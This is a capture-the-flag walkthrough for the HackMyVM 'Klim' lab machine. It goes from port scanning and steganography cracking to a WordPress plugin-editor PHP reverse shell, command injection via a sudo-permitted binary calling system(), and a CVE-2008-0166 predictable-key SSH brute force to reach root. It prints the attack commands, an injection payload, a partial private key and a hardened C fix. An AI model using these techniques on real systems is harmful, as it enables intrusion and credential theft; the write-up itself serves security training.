HackMyVm Klim Walkthrough
https://hackmyvm.eu/machines/machine.php?vm=Klim
Scan ports.
```bash
nmap -sV -sC -p- -oN ports.log 192.168.56.100
Nmap scan report for 192.168.56.100
Host is up (0.0024s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 81:f5:0a:b3:b5:0d:a6:ed:ce:53:93:05:15:17:b1:b0 (RSA)
|   256 fd:7c:3d:73:f6:a4:c1:74:7b:41:27:68:ec:54:c4:61 (ECDSA)
|_  256 8c:28:b7:7b:5d:5c:f1:29:91:4e:85:34:26:55:ac:c6 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Ubuntu Default Page: It works Annex02!
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
Directory brute-force on port 80 found a WordPress install.
```bash
/index.html (Status: 200) [Size: 11331]
/wordpress (Status: 301) [Size: 320] [--> http://192.168.56.100/wordpress/]
```
Running wpscan against /wordpress found nothing useful. Manually checking /wordpress/wp-content/uploads turned up an image.
```bash
wget http://192.168.56.100/wordpress/wp-content/uploads/2021/07/image.jpg
```
The image carries steghide data. Crack the passphrase with stegseek and a wordlist; the embedded file is called dump.
```bash
stegseek image.jpg /usr/share/wordlists/rock_ascii.txt
StegSeek version 0.5
Progress: 10.94% (15259007 bytes)
[i] --> Found passphrase: "ichliebedich"
[i] Original filename: "dump"
[i] Extracting to "image.jpg.out"
mv image.jpg.out dump
```
The dump is a captured wp-login.php POST body, so it contains login credentials. The pwd field is URL-encoded (%23 is '#'), so decode it before use.
```bash
cat dump | grep pwd
log=klim&pwd=ss7WhrrnnHOZC%239bQn&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.0.26%2Fwordpress%2Fwp-admin%2F&testcookie=1
python3 -c "import urllib.parse;print(urllib.parse.unquote('ss7WhrrnnHOZC%239bQn'))"
ss7WhrrnnHOZC#9bQn
```
Log in to WordPress as klim with that password. Under Plugins > Plugin Editor, pick a plugin file (here akismet/akismet.php), paste PHP reverse-shell code into it and save. Start a listener, then request the edited file so the PHP runs and connects back:
```bash
curl http://192.168.56.100/wordpress/wp-content/plugins/akismet/akismet.php
```
```bash
nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:57032.
Linux klim 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64 GNU/Linux
 04:51:34 up 29 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
Check sudo -l as www-data.
```bash
www-data@klim:/home/klim$ sudo -l
Matching Defaults entries for www-data on klim:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on klim:
    (klim) NOPASSWD: /home/klim/tool
```
Decompile /home/klim/tool and read the pseudocode below. It builds the string "cat " + argv[1] and hands it to system(), so under the sudo rule it reads any file klim can read. Because argv[1] reaches /bin/sh unescaped, shell metacharacters in it would also run as klim (for example an argument of `'; /bin/sh'`), but reading klim's private key is enough here.
```c
int __cdecl main(int argc, const char **argv, const char **envp)
{
  size_t v3; // rbx
  size_t v4; // rax
  char s[5]; // [rsp+1Bh] [rbp-25h] BYREF
  char *dest; // [rsp+20h] [rbp-20h]
  size_t size; // [rsp+28h] [rbp-18h]

  strcpy(s, "cat ");                  // fixed command prefix
  v3 = strlen(s);
  size = v3 + strlen(argv[1]) + 1;    // no argc check: argv[1] is used unconditionally
  dest = (char *)malloc(size);
  strncpy(dest, s, size);
  v4 = strlen(s);
  strncat(dest, argv[1], size - v4);  // "cat " + argv[1], not escaped or validated
  system(dest);                       // executed through /bin/sh as the sudo target user (klim)
  return 0;
}
```
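To make the injection explicit, here is an added example (my own code, not the binary from the VM and not the author's). `build_cat_command` reproduces the decompiled concatenation so you can see what string system() would receive, `has_shell_meta` flags arguments that /bin/sh would interpret as more than a filename, and `safe_cat` is the hardened form: it runs /bin/cat via execv with the argument as a single argv entry, so no shell ever parses it. All three function names are assumptions for illustration; the real fix for the privilege issue is still the sudo rule, since even the hardened tool reads anything klim can read.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Mirrors the decompiled tool: "cat " + arg, built with the same
 * strncpy/strncat sequence, returned as a heap string (caller frees).
 * The original passes this straight to system(). */
char *build_cat_command(const char *arg)
{
    const char prefix[] = "cat ";
    size_t size = strlen(prefix) + strlen(arg) + 1;
    char *dest = malloc(size);
    if (!dest)
        return NULL;
    strncpy(dest, prefix, size);
    strncat(dest, arg, size - strlen(prefix));
    return dest;            /* arg "; id" -> "cat ; id" */
}

/* Returns 1 if arg contains characters /bin/sh would interpret, i.e. the
 * argument would do more than name one file once system() runs it. */
int has_shell_meta(const char *arg)
{
    return strpbrk(arg, ";&|$`<>()\\\"' \t\n*?[]{}~#") != NULL;
}

/* Hardened form: no shell. /bin/cat receives the argument as one argv
 * entry, so "; id" is just a (non-existent) filename. "--" stops cat from
 * treating a leading '-' as an option. Returns cat's exit status, -1 on error. */
int safe_cat(const char *path)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const cat_argv[] = { "cat", "--", (char *)path, NULL };
        execv("/bin/cat", cat_argv);
        _exit(127);         /* only reached if execv fails */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(int argc, char **argv)
{
    if (argc != 2) {
        fprintf(stderr, "usage: %s <file>\n", argv[0]);
        return 1;
    }
    char *cmd = build_cat_command(argv[1]);
    printf("original tool would run via system(): %s\n", cmd);
    if (has_shell_meta(argv[1]))
        printf("argument contains shell metacharacters: system() would execute more than cat\n");
    free(cmd);
    return safe_cat(argv[1]);
}
```

Run it as `./demo '/dev/null; echo INJECTED'`: the printed command line shows what the VM's binary would have executed, while `safe_cat` only reports that no file with that name exists.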
Get klim's SSH private key through the tool.
```bash
www-data@klim:/home/klim$ sudo -u klim ./tool .ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEA0IBOKXuvWzdN/rTJXWZ7b1FadoLr5jQZ+LkaEJDWaUnYFlCpNd4e
...
jwq/pz/4h+tzLkK+HocyYZFSZ+3Q3Rv4CK7HeWC80rfLNsc3ZktG755/WQLlXCSJ50sUmp
Fp3Lkp1BGomrgELk4qqf3aF291nYcnSZVu0AfvlRWHHa52o23nuhu/rdcTQX5Lh4kWhWyz
49he3VMR4O2JnBj2dwAAAAlrbGltQGtsaW0=
-----END OPENSSH PRIVATE KEY-----
www-data@klim:/home/klim$
```
Save it locally with mode 600 (ssh refuses a key file with wider permissions) and log in over SSH as klim.
```bash
ssh klim@192.168.56.100 -i id_rsa
Linux klim 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Jul 25 12:19:50 2021 from 192.168.0.28
/usr/bin/xauth:  file /home/klim/.Xauthority does not exist
klim@klim:~$ id
uid=1000(klim) gid=1000(klim) groupes=1000(klim),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
```
In /opt there is an id_rsa.pub. Following the author's hint (openssl), this points to the Debian OpenSSL predictable PRNG bug (CVE-2008-0166): on affected Debian systems the only entropy in key generation was the process ID, so there are just 32768 possible keys per type and size, and precomputed sets exist. searchsploit finds the SSH brute-forcer:
```bash
searchsploit openssl ...
OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH | linux/remote/5720.py
...
```
Follow the steps in the PoC: fetch the precomputed key set (5622.tar.bz2), then run 5720.py (a Python 2 script) against root over SSH. Since the target's public key is available from /opt, a quicker alternative is to grep the extracted .pub files for its key blob and use the matching private key directly, instead of trying every key against sshd.
```bash
wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5622.tar.bz2
tar -jxvf 5622.tar.bz2
python 5720.py rsa/2048 192.168.56.100 root 22
Tested 9979 keys | Remaining 22789 keys | Aprox. Speed 25/sec
Key Found in file: 54701a3b124be15d4c8d3cf2da8f0139-2005
Execute: ssh -lroot -p22 -i rsa/2048/54701a3b124be15d4c8d3cf2da8f0139-2005 192.168.56.100
Tested 10001 keys | Remaining 22767 keys | Aprox. Speed 4/sec
```
Get root login with the recovered key.
```bash
ssh root@192.168.56.100 -i 54701a3b124be15d4c8d3cf2da8f0139-2005
...
root@klim:~# id;hostname
uid=0(root) gid=0(root) groupes=0(root)
klim
```